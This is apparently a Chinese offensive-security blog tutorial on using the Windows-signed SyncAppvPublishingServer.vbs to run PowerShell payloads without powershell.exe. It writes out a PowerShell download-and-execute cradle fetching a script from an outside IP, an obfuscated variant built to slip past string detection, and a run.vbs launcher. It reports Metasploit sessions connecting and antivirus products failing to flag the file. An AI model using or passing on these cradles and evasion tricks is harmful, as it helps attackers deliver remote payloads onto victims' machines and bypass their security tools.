远控免杀专题（54）-白名单SyncAppvPublishingServer.vbs执行payload

braveX

一、SyncAppvPublishingServer简介

Windows上有两个版本的SyncAppVPublishingServer工具，它们是：SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。


二、SyncAppvPublishingServer使用


在powershell下执行

1. SyncAppvPublishingServer.vbs break;powershell代码

复制代码

测试过程中使用的是SyncAppvPublishingServer.vbs，SyncAppvPublishingServer.exe 没有成功
在cmd里是无法执行powershell命令的


该命令需要在powershell里进行执行



因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。


三、SyncAppvPublishingServer执行payload


使用powershell木马。

1. powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

复制代码

将powershell脚本进行混淆使用IEX远程加载执行payload。

1. $c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

复制代码

msf可正常上线。



在实战中也可以直接写成vbs脚本run.vbs

1. Set oShell=WScript.CreateObject("WScript.Shell")
   
2. 
   
3. oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

复制代码

点击run.vbs也可以正常上线。



火绒、360均没有检测出



放在virustotal.com上a.bat查杀率为1/56


四、参考资料


Powershell Without Powershell.exe
https://www.youtube.com/watch?v=sema3EYnP2c


该文章转载于https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247486122&idx=1&sn=7cf84e8fda23dd01168f58e88af7e71d&chksm=ce5e28cbf929a1dd45b5c9e11d787b0d065758367f2a6444351fba33ac3845e9cbcd6d44c7a8&mpshare=1&scene=23&srcid=&sharer_sharetime=1584872903596&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd